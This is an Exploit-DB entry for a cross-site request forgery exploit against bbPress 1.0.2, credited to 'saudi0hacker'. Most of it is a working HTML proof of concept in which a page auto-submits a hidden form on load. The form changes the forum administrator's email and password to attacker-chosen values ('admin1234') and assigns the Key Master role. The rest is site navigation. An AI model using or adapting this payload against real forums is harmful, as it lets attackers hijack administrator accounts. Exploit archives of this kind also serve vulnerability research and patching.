bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

14214

CVE:

N/A

EDB Verified:

Author:

saudi0hacker

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-07-05

Vulnerable App:

: # Software      : bbPress v 1.0.2                                          :
: # site          : www.bbpress.org                                          :
: # date          : 29/6/2010                                                : 
: # Author        : saudi0hacker                                             :
: # Date          : May 25, 2010                                             :
: # Type : CSRF                                                              :
: # Greetz to     : pr.al7rbi : so busy : evil-ksa : Dr.dakota : v4-team.com :
:----------------------------------------------------------------------------:

<html>
 <body onload="document.forms['Login'].submit();">
<form method="post" name = "Login" action="http://localhost/bb/profile.php?id=1&tab=edit">

<select type="hidden" name="display_name" id="display_name">
<option type="hidden" id="display_displayname" value="admin">admin</option>
<input type="hidden" name="user_email" id="user_email"  value="admin@sss.com" />
<input  id="_wpnonce" name="_wpnonce" value="98dfb69b68" /><input type="hidden" name="_wp_http_referer" value="/bb/profile.php?id=1&tab=edit" />
<select type="hidden" id="admininfo_role" name="role">
<option value="keymaster" selected="selected">Key Master</option>
<input name="pass1" type="hidden" value= "admin1234" id="pass1" autocomplete="off" />
<input name="pass2" type="hidden" value= "admin1234" id="pass2" autocomplete="off" />
<input type="submit" name="Submit" value="save" />

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services